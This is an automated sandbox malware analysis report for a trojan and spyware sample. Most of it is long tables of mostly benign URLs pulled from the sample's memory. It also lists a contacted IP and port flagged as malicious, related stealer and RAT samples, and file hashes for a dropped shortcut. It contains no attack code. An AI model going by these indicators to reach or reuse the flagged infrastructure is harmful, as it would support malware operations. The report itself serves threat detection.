http://tempuri.org/Entity/Id4	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19Response	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13ResponseD	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5ResponseD	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/sc	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1ResponseD	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id20	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1	0%	URL Reputation	safe
http://tempuri.org/Entity/Id23	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21ResponseD	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/trust	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10	0%	URL Reputation	safe
http://tempuri.org/Entity/Id11	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10ResponseD	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce	0%	URL Reputation	safe
http://tempuri.org/Entity/Id17	0%	URL Reputation	safe
http://tempuri.org/Entity/Id18	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15ResponseD	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	0%	URL Reputation	safe
http://tempuri.org/Entity/Id11ResponseD	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	0%	Avira URL Cloud	safe
23.94.183.150:5058	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
23.94.183.150:5058	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	jjjUC5ggb2nQMb1B6SvBkwmT.exe	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id14ResponseD	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id23ResponseD	in.exe, 0000000B.00000002.2139768224.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id12Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id9	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id8	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6ResponseD	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id4	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id7	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id19Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id13ResponseD	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5ResponseD	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	in.exe, 0000000B.00000002.2139768224.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	jjjUC5ggb2nQMb1B6SvBkwmT.exe	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/sc	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id1ResponseD	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id9Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id20	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id23	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id24	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id24Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id1Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21ResponseD	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	jjjUC5ggb2nQMb1B6SvBkwmT.exe	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id10	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id11	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id10ResponseD	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id12	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id13	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id14	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id17	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id18	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id19	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15ResponseD	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id10Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id11ResponseD	in.exe, 0000000B.00000002.2139768224.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id8Response	in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	jjjUC5ggb2nQMb1B6SvBkwmT.exe	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.94.183.150	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483181
Start date and time:	2024-07-26 19:25:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	jjjUC5ggb2nQMb1B6SvBkwmT.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 185 Number of non-executed functions: 244
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: jjjUC5ggb2nQMb1B6SvBkwmT.exe

Simulations

Behavior and APIs

Time	Type	Description
13:26:05	API Interceptor	9x Sleep call for process: in.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	104.168.36.68
	172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.3.101.142
	1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.210.214.9
	IFqsFpijFt.rtf	Get hash	malicious	Remcos	Browse	198.46.176.133
	girlfrnd.doc	Get hash	malicious	GuLoader, Remcos	Browse	104.168.45.34
	erthings.doc	Get hash	malicious	Remcos	Browse	192.3.101.142
	girlfrnd.doc	Get hash	malicious	Remcos	Browse	198.46.176.133
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	192.227.225.166
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	192.227.225.166
	DHL Shipment Notification 490104998009.xls	Get hash	malicious	Remcos	Browse	192.3.101.142

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\main\7z.dll	LisectAVT_2403002A_166.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	LisectAVT_2403002A_166.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	installer.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse
	conhost.exe	Get hash	malicious	Xmrig	Browse
	Software1.30.1.exe	Get hash	malicious	RedLine, Xmrig	Browse
	u841TF5Qex.exe	Get hash	malicious	DCRat	Browse
	Laun3cher_E@zy.exe	Get hash	malicious	LummaC, Apollo, LummaC Stealer, Xmrig	Browse
	8oPNV681Qw.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse
	hZE4solQRQ.exe	Get hash	malicious	DCRat	Browse
	d5raNaLQ8Q.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\Users\Public\Desktop\Google Chrome.lnk

Process:	C:\Users\user\AppData\Local\Temp\main\in.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:52 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.45122343775873
Encrypted:	false
SSDEEP:	48:8S+l2dfTXd3RYrnvPdAKRkdAGdAKRFdAKRE:8S+lOw
MD5:	9B06439B83E535E5E3CE4AF78E54A69B
SHA1:	06BD847740A637836F667894EBA8FFE2A7F0C227
SHA-256:	6CBC2DAA6A8AE26AC037CB636CF45A7AEF2A7B1E64E18D774C5A294CACD3632F
